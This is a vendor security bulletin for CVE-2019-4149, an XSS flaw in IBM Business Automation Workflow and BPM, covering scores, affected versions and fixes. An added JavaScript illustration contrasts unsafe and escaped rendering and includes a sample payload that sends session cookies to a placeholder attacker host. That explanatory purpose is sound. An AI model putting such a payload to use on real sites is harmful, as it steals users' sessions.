Security Bulletin: Cross-site scripting vulnerability in IBM Business Automation Workflow and IBM Business Process Manager (BPM) (CVE-2019-4149)

2022-09-1415:02:20
www.ibm.com
Tags: ibm, business automation workflow, bpm, cross-site scripting, vulnerability, credentials disclosure, web ui, javascript, fix, upgrade

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

19.6%

Summary

A cross-site scripting vulnerability in IBM Business Automation Workflow and IBM BPM has been found.

Vulnerability Details

CVEID: CVE-2019-4149
DESCRIPTION: IBM Business Automation Workflow is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session.
CVSS Base Score: 5.4
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/158415 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
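As an added illustration of the vulnerability class described above (this is not IBM's code, and the bulletin does not identify which input or page of the Web UI is affected), the following JavaScript shows the rendering pattern that produces this kind of flaw beside its hardened form. The display-name field, the wrapper markup, the escaping helper and the exfiltration payload are all assumptions constructed for the example.

```javascript
// Added example for CVE-2019-4149's vulnerability class (cross-site scripting).
// Not IBM code: the affected input in Business Automation Workflow / BPM is
// not described in the bulletin, so a hypothetical "display name" field is used.

// Constructed sample input: a value that, if inserted as raw HTML, runs an
// event handler that sends the session cookie to an attacker-controlled host.
// The host name is a placeholder, not a real endpoint.
const SAMPLE_NAME =
  '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">';

// Vulnerable pattern: untrusted text concatenated straight into markup.
// Whatever the user typed becomes part of the DOM, tags and handlers included.
function renderUnsafe(name) {
  return '<span class="user">' + name + '</span>';
}

// Hardened pattern: HTML-encode the characters that can start a tag, end an
// attribute value or introduce an entity before the value reaches the DOM.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderSafe(name) {
  return '<span class="user">' + escapeHtml(name) + '</span>';
}

// Check used below: strip the known wrapper and see whether the user-controlled
// part still contains raw angle brackets, i.e. whether the browser would parse
// any of it as markup rather than as text.
function innerHtmlOf(fragment) {
  const m = /^<span class="user">([\s\S]*)<\/span>$/.exec(fragment);
  return m ? m[1] : fragment;
}
function introducesMarkup(fragment) {
  return /[<>]/.test(innerHtmlOf(fragment));
}
```

The escaping has to happen at the output point, in the context the value is written into; the same value dropped into a JavaScript string or a URL needs a different encoder. The payload also shows why session cookies in such a UI should carry the HttpOnly flag: it does not prevent the injection, but it removes document.cookie as the easiest thing for injected script to steal.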

Affected Products and Versions

- IBM Business Automation Workflow V18.0.0.0 through V18.0.0.2

- IBM Business Process Manager V8.6.0.0 through V8.6.0.0 Cumulative Fix 2018.03

- IBM Business Process Manager V8.5.7.0 through V8.5.7.0 Cumulative Fix 2017.06

- IBM Business Process Manager V8.5.6.0 through V8.5.6.0 CF2

Remediation/Fixes

Install interim fix JR60802 as appropriate for your current IBM Business Automation Workflow or IBM BPM version.

For IBM Business Automation Workflow V18.0.0.0 through V18.0.0.2
· Upgrade to at least IBM Business Automation Workflow V18.0.0.0 as required by iFix and then apply iFix JR60802
-- OR --
· Apply cumulative fix IBM Business Automation Workflow V19.0.0.1

For IBM BPM V8.6.0.0 through V8.6.0.0 CF 2018.03
· Upgrade to at least IBM BPM V8.6.0.0 CF 2017.12 as required by iFix and then apply iFix JR60802

For IBM BPM V8.5.7.0 through V8.5.7.0 CF 2017.06
· Apply Cumulative Fix 2017.06 and then apply iFix JR60802

For IBM BPM V8.5.6.0 through V8.5.6.0 CF2
· Apply CF2 as required by iFix and then apply iFix JR60802

Workarounds and Mitigations

None

Affected configurations

CPE entries (the page shows only the first 10 of 411 rows):

- cpe:2.3:a:ibm:business_automation_workflow:18.0.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:business_automation_workflow:18.0.0.1:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:business_automation_workflow:18.0.0.2:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:business_process_manager:8.6.0.:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:business_process_manager:201803:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:business_process_manager:201712:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:business_process_manager:8.6:*:*:*:*:*:*:*
- cpe:2.3:a:ibm:business_process_manager:8.5.7.:*:*:*:advanced:*:*:*
- cpe:2.3:a:ibm:business_process_manager:201706:*:*:*:advanced:*:*:*
- cpe:2.3:a:ibm:business_process_manager:201703:*:*:*:advanced:*:*:*
